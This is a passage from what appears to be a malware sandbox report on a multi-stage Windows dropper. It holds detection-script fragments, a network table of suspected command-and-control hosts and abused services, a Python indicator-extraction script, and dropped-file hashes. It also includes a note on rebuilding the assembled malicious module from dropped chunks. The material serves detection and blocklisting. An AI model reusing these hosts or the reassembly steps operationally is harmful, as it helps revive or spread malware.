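            if detail.lower().endswith(".dll"):
                continue
            detail = f"{detail} (non-.dll extension)"
        elif name == "copy_b_chunk_reassembly":
            parsed = extract_reassembly(cmdline)
            if parsed:
                chunks, out = parsed
                detail = f"{len(chunks)} chunks -> {out}"
        hits.append((name, detail))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for rule, detail in triage(line):
            print(f"{rule:28s} {detail}")
```

The chunk order recovered from the `copy /b` expression is also the order in which to concatenate the dropped files listed in the Files section if the assembled module has to be rebuilt from the sandbox's artifacts; the first chunk is only the "MZ" stub, so the second chunk starts at offset 2 of the final PE.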
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 127.0.0.1:53164 | | tcp |
| N/A | 127.0.0.1:53166 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 72.84.118.132:8080 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
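The network table mixes DNS queries (8.8.8.8:53 udp), reverse lookups of the sandbox's own peers, and the actual connections, and some rows carry the protocol in the Domain column. What matters for indicators is the repeated connections to non-standard ports (135.181.129.119:4805 and 91.121.67.60:2151 recur throughout the run) and the public services the sandbox flags as abused (iplogger.org, pastebin.com, cdn.discordapp.com) or used for external IP lookup (ip-api.com). The Python below is an added example, not part of this report: it parses rows in the table's format, tolerates the shifted rows, separates lookups from connections, and lists those candidates. The embedded rows are a constructed excerpt of the table above; the allowlist entry for r11.o.lencr.org (Let's Encrypt OCSP) and the two-hit threshold for calling something a beacon are assumptions.

```python
from collections import Counter

# Constructed excerpt of the network table above (same column layout, including
# rows whose Domain cell is empty and whose protocol slid into that column).
SAMPLE_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| N/A | 127.0.0.1:53164 | tcp | |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
"""

STANDARD_PORTS = {53, 80, 443}
# Public services the sandbox signatures flag as abused for hosting/C2 and for IP lookup.
ABUSED_SERVICES = {"iplogger.org", "pastebin.com", "cdn.discordapp.com"}
IP_LOOKUP_SERVICES = {"ip-api.com"}
# Assumed allowlist: Let's Encrypt OCSP responder traffic is TLS-stack noise.
INFRA_NOISE = {"r11.o.lencr.org"}


def parse_table(text):
    """Parse `| Country | Destination | Domain | Proto |` rows into dicts."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        # Misaligned row: protocol sits in the Domain column, Proto is empty.
        if not proto and domain.lower() in ("tcp", "udp"):
            domain, proto = "", domain
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def summarize(rows, min_hits=2):
    """Split DNS lookups from connections and pull out IOC candidates."""
    hits = Counter()
    domains = set()
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            # Reverse lookups of the sandbox's own peers are resolver noise.
            if not r["domain"].endswith(".in-addr.arpa"):
                domains.add(r["domain"])
            continue
        hits[f'{r["ip"]}:{r["port"]}'] += 1
        if r["domain"]:
            domains.add(r["domain"])
    # Repeated connections to a non-standard port on a non-loopback host.
    beacons = sorted(
        dest for dest, n in hits.items()
        if n >= min_hits
        and int(dest.rsplit(":", 1)[1]) not in STANDARD_PORTS
        and not dest.startswith("127.")
    )
    return {
        "beacons": beacons,
        "abused_services": sorted(domains & ABUSED_SERVICES),
        "ip_lookup": sorted(domains & IP_LOOKUP_SERVICES),
        "other_domains": sorted(domains - ABUSED_SERVICES - IP_LOOKUP_SERVICES - INFRA_NOISE),
    }


if __name__ == "__main__":
    for key, values in summarize(parse_table(SAMPLE_TABLE)).items():
        print(f"{key:16s} {', '.join(values) or '-'}")
```

A DNS row only says that a name was queried; the table does not record the answer, so the IP-to-name pairing comes from the sandbox's own annotation on the TCP rows. Names that were queried but never connected to (for example the many t.gogamec.com and staticimg.youtuuee.com lookups above) still end up in other_domains, which is the right place for them in a blocklist.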
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | bc10ee7cbbf3ea8b505c94bd655f5e50 |
| SHA1 | 4667e7d52e54ba83ee7c264c14171a4db0d1c444 |
| SHA256 | 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111 |
| SHA512 | a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/4908-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-77-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-76-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1784-78-0x0000000004AD0000-0x0000000004B06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe
| MD5 | 508251b34a5ea5271e6c8d365b3623d2 |
| SHA1 | a6f057ba3154fca2a2000cbb7ee9c171c682a8ac |
| SHA256 | a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f |
| SHA512 | 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170 |
memory/3816-93-0x0000000006160000-0x00000000061C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/3816-91-0x0000000005980000-0x00000000059A2000-memory.dmp
memory/3816-113-0x0000000006240000-0x0000000006594000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhtdin5l.1lz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2508-107-0x00000000001C0000-0x00000000001D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/4364-97-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3816-103-0x00000000061D0000-0x0000000006236000-memory.dmp
memory/1892-118-0x0000000000070000-0x0000000000078000-memory.dmp
memory/4060-121-0x00000000051C0000-0x0000000005236000-memory.dmp
memory/5068-126-0x0000000000BA0000-0x0000000000C10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/4060-127-0x0000000005160000-0x000000000517E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-JIEQ4.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/4060-147-0x00000000058F0000-0x0000000005E94000-memory.dmp
memory/2508-125-0x00000000021C0000-0x00000000021C6000-memory.dmp
memory/2892-152-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4060-119-0x0000000000950000-0x00000000009C0000-memory.dmp
memory/3816-79-0x0000000005A30000-0x0000000006058000-memory.dmp
memory/3816-158-0x0000000006BD0000-0x0000000006C1C000-memory.dmp
memory/3816-156-0x0000000006850000-0x000000000686E000-memory.dmp
memory/2556-155-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-T84SO.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/4364-161-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4908-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-68-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-65-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4908-181-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3712-171-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/4908-176-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4908-172-0x0000000000400000-0x000000000051C000-memory.dmp
memory/4908-180-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4908-179-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-67-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4908-66-0x0000000064941000-0x000000006494F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/3816-202-0x0000000006DE0000-0x0000000006DFE000-memory.dmp
memory/3816-192-0x000000006F400000-0x000000006F44C000-memory.dmp
memory/3816-190-0x0000000006E00000-0x0000000006E32000-memory.dmp
memory/3816-215-0x00000000078E0000-0x0000000007983000-memory.dmp
memory/1360-216-0x0000000005910000-0x0000000005A1A000-memory.dmp
memory/1784-205-0x000000006F400000-0x000000006F44C000-memory.dmp
memory/1360-218-0x0000000005880000-0x00000000058BC000-memory.dmp
memory/1360-204-0x00000000057E0000-0x00000000057F2000-memory.dmp
memory/3816-220-0x00000000078B0000-0x00000000078CA000-memory.dmp
memory/3816-219-0x0000000008210000-0x000000000888A000-memory.dmp
memory/1360-203-0x0000000005D90000-0x00000000063A8000-memory.dmp
memory/1360-187-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3816-221-0x0000000007BF0000-0x0000000007BFA000-memory.dmp
memory/3816-222-0x0000000007DE0000-0x0000000007E76000-memory.dmp
memory/1784-223-0x0000000007590000-0x00000000075A1000-memory.dmp
memory/3816-236-0x0000000007DA0000-0x0000000007DAE000-memory.dmp
memory/3816-237-0x0000000007DB0000-0x0000000007DC4000-memory.dmp
memory/3816-239-0x0000000007EA0000-0x0000000007EBA000-memory.dmp
memory/1784-241-0x00000000076B0000-0x00000000076B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM
| MD5 | b3eb9fd17e8ad098cabb8c902e9e229b |
| SHA1 | 496db608d89ede6d7e52cc12c87fd51985d77dd3 |
| SHA256 | 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7 |
| SHA512 | 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9 |
C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\nytFSko.4
| MD5 | f07fb7ba321155969395fd0bb1b66ecd |
| SHA1 | c33f97f3bcd9152263cd3a267f7718bfe74871d4 |
| SHA256 | 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee |
| SHA512 | 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
